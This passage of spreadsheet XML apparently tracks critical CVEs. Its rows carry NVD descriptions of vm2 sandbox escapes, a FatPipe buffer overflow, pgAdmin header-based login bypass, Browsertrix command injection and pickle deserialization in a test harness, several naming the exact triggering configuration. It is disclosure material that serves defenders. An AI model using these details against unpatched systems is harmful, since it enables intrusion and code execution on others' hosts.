          <t>CVE-2026-90823</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain a stack-based buffer overflow in /usr/sbin/auth_user_pass. An unauthenticated remote attacker with access to the affected management interface can submit a crafted authentication request that reaches an unchecked copy into a fixed-size stack buffer, potentially allowing arbitrary code execution as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90823</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92944</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001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2026-09-17</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.2 through 3.11.6 contain a sandbox escape vulnerability on Node.js 26 where Promise.prototype.finally() bypasses vm2's wrapper protections due to a stale PromiseThenLookupChain protector in V8 14.6. Attackers can exploit this by creating an async function that returns a Promise with an attacker-controlled constructor Symbol.species, allowing them to reach the host Function constructor and process object for arbitrary code execution.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92944</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54053</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Many Notes is a Markdown note-taking web application designed for simplicity. Prior to 0.16.0, the ZIP vault import implemented in app/Actions/ProcessImportedVault.php accepts archive filenames containing parent-directory traversal segments. An authenticated user can write arbitrary files outside the importing user's vault and into other users' vaults, including overwriting existing files. Disguised SVG content can be placed in another user's vault and execute stored cross-site scripting when the victim opens that vault. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54053</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54752</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-829</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The validation test harness can deserialize pull-request-controlled tracked pickle cache files through pickle.load in the read_pickle_data function in tests/pickle_operations.py. An unauthenticated contributor can change USE_LOCAL_KNOWN_SLUGS in tests/test_configuration.py and supply a crafted tests/known-modules.pickle or tests/known-racks.pickle file that tests/definitions_test.py loads when pytest runs. Deserialization invokes attacker-controlled object reduction behavior, allowing arbitrary code execution in the GitHub Actions runner or in a maintainer process that runs the tests, with the confidentiality, integrity, and availability of reachable resources at risk. This vulnerability is fixed with commit 1c6f7e2b93589b965318c6e67ac3504831f0e71e.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54752</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87701</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Cosmos DB allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87701</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92934</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains an incomplete fix for Error.cause sanitization that allows sandbox escape when revisited host-wrapped AggregateError objects are caught within a single exception handler traversal. Attackers can exploit cycle detection bypass in handleException to access unsanitized host proxies embedded in the errors array, enabling full remote code execution and process information disclosure from the sandbox.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92934</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92935</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted Node.js code. In versions &gt;= 3.11.4 and &lt;= 3.11.6, the NodeVM constructor computes `hasRealRequireConfig` with `typeof requireOpts === 'object' &amp;&amp; requireOpts !== null`, so an array-shaped `require` value (for example `require: []`) satisfies the guard that is meant to reject nesting without an explicit require configuration. `makeResolverFromLegacyOptions()` then destructures the array into undefined option fields and returns a resolver containing only `NESTING_OVERRIDE.vm2`. As a result, an attacker who can supply JavaScript executed by a NodeVM configured with truthy `nesting` and an array-shaped `require` (e.g. `new NodeVM({nesting: true, require: []})`) can require the host `vm2` module, create an inner NodeVM with an attacker-chosen builtin allowlist (such as `child_process`), and execute arbitrary commands with the privileges of the host Node.js process, escaping the sandbox. Outer builtin restrictions do not constrain the attacker-created inner NodeVM. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92935</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54501</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-77, CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Browsertrix is a high-fidelity, browser-based crawling service for web archiving that can be self-hosted or used through Webrecorder's hosted instance. From 1.15.0 until 1.22.8, Browsertrix improperly sanitizes Git URLs specified as Custom Behaviors, allowing command injection through /api/orgs/*/crawlconfigs/validate/custom-behavior. A user with crawler or administrator permission on the specific instance can supply a crafted Git URL that executes arbitrary operating-system commands in the backend pod. Open registration or hosted free-trial access can make the required role broadly obtainable. Successful exploitation can expose, modify, or delete application database records, archived items, browser profiles, storage data, proxy credentials, and other configured service data. This issue is fixed in version 1.22.8.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54501</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54618</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-522, CWE-601</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Obsidian Web MCP is a secure remote MCP server for Obsidian vaults. Prior to 0.2.0, /oauth/authorize issues an authorization code without a login, consent, or session check, and /oauth/token can exchange that code for the static VAULT_MCP_TOKEN without authenticating a client. An unauthenticated remote caller who can reach the intended tunnel deployment can therefore call /mcp and use vault_read, vault_write, vault_search, vault_list, vault_move, and vault_delete against the entire vault. Optional PKCE does not prevent an attacker-initiated flow, and unauthenticated /oauth/register also exposes a client_credentials path by returning the configured VAULT_OAUTH_CLIENT_SECRET. This issue is fixed in version 0.2.0.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54618</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92939</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-114</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.3 through 3.11.6 exposes the host Node.js crypto module to a NodeVM sandbox when the crypto builtin is allowed. The module is presented via a recursive read-only proxy, but its callable exports still execute with host-process authority. Sandboxed JavaScript can therefore call crypto.setEngine() with a filesystem path to an attacker-supplied native library (for example, one bundled in an untrusted plugin package already written to disk); OpenSSL asks the operating-system dynamic loader to load the file, and the library's constructor executes native code in the host process before engine-symbol validation rejects it. Exploitation requires only the crypto builtin and does not require fs, process, module, child_process, worker_threads, vm, or inspector access, resulting in a sandbox escape and arbitrary native code execution. Fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92939</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92951</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains an incorrect authorization vulnerability in the external package allowlist check that uses non-exact substring matching instead of full package-name boundary validation. Attackers can bypass the allowlist by requiring a colliding package name that contains an allowlisted package substring, causing vm2 to load and execute unauthorized host packages in the host context.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92951</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92957</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 does not normalize `node:`-prefixed builtin specifiers when evaluating user-supplied negative (deny) entries in a NodeVM wildcard require policy. Although NodeVM strips the `node:` prefix during require() resolution, negative wildcard entries are matched by exact string comparison against the canonical builtin names, so a policy such as `new NodeVM({ require: { builtin: ['*', '-node:child_process'] } })` fails to deny the canonical `child_process` module. Sandboxed code can therefore obtain the host `child_process` builtin via `require('child_process')` or `require('node:child_process')`, gaining references to process-spawning APIs such as execSync and spawn, which is equivalent to host command-execution capability for untrusted sandbox code. Fixed in vm2 3.11.7. (Suggested title: "vm2 before 3.11.7: NodeVM builtin deny-list bypass via node:-prefixed specifiers exposes child_process")</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92957</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54237</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-94</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Wavelog is web-based amateur radio logging software. From 1.8 until 2.4.2, Wavelog exposes /install/ajax.php and /install/includes/interface_assets/triggers.php after installation without an installation lock or permission check. Unsanitized input reaches write_config() and write_configfile() in install/includes/core/core_class.php, allowing a remote unauthenticated attacker to read or write log files and place attacker-controlled content into PHP configuration files. The resulting PHP configuration content can execute on the server. This issue is fixed in version 2.4.2.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54237</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70009</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70009</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86863</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-807</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Webserver authentication source is intended to accept an identity asserted by the web server or reverse proxy in front of pgAdmin, delivered through the WSGI/CGI environment. WebserverAuthentication.get_user() read config.WEBSERVER_REMOTE_USER from request.environ and, when that returned nothing, fell back to reading the same name directly from the inbound HTTP request headers via request.headers.get(). An inbound HTTP header is written by whoever sends the request, so any client able to reach pgAdmin could supply that header itself and be authenticated as any username it named, including an existing Administrator, without presenting a password or any other credential. The environment lookup could also be satisfied by a client-supplied header whenever WEBSERVER_REMOTE_USER was configured to an HTTP_-prefixed or hyphenated name such as HTTP_X_FORWARDED_USER or X-Forwarded-User, since WSGI servers place inbound headers into the environment under exactly those names. Deployments are affected only when 'webserver' is enabled in AUTHENTICATION_SOURCES.
